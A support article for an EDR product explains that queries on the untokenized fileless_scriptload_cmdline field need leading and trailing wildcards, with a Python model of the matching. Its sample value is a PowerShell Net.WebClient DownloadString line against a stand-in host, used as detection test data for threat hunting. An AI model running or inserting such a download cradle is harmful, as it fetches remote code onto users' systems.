
EDR: Fileless_Scriptload_Cmdline Searches not Working as Expected


Environment

  • EDR Server: 7.6.1

Symptoms

Example:

The following query does not return any results:

           fileless_scriptload_cmdline:Net.WebClient

The same search with leading and trailing wildcards returns the expected results:

          fileless_scriptload_cmdline:*Net.WebClient*

NOTE:
          For the wildcard query to work, disable the feature "Block Searches with Leading Wildcards" in Settings -> Advanced Settings.

Cause

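The fileless_scriptload_cmdline field is not tokenized, so a search term without wildcards is compared against the entire field value rather than against the individual words in it.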
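
The following is an added illustration, not code from the product or this article: a simplified Python model of why the bare term misses on an untokenized field, why the wildcard form matches, and how the "Block Searches with Leading Wildcards" setting interacts with it. The sample field value, the delimiter set, and case-insensitive matching are assumptions; the server's real analyzer may differ.

```python
import fnmatch
import re

# Constructed sample value for fileless_scriptload_cmdline (not from the article).
SAMPLE = "$c = New-Object Net.WebClient; $c.DownloadString('http://example.invalid/x')"

# Assumed delimiter set for the tokenized model; the real analyzer may differ.
DELIMS = r"[\s()\[\]{}'\";,=]+"


def index_terms(value, tokenized):
    """Return the set of terms the index would hold for one field value."""
    if tokenized:
        return {t.lower() for t in re.split(DELIMS, value) if t}
    # Untokenized: the whole value is stored as a single term.
    return {value.lower()}


def search(term, value, tokenized, block_leading_wildcards=True):
    """Model a `field:term` query. * and ? are wildcards; matching is per term."""
    if term.startswith(("*", "?")) and block_leading_wildcards:
        raise ValueError("leading wildcard searches are blocked by server settings")
    pattern = term.lower()  # assumption: case-insensitive matching
    return any(fnmatch.fnmatchcase(t, pattern)
               for t in index_terms(value, tokenized))


if __name__ == "__main__":
    # Untokenized field: the bare term must equal the whole value, so it misses.
    print(search("Net.WebClient", SAMPLE, tokenized=False))
    # Wildcards on both sides match, but only with the blocking setting disabled.
    print(search("*Net.WebClient*", SAMPLE, tokenized=False,
                 block_leading_wildcards=False))
    # Tokenized field: the bare term matches one of the stored tokens.
    print(search("Net.WebClient", SAMPLE, tokenized=True))
```
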

Resolution

This issue is resolved in EDR Server build 7.7.0.

Article Information
Creation Date: 03-01-2023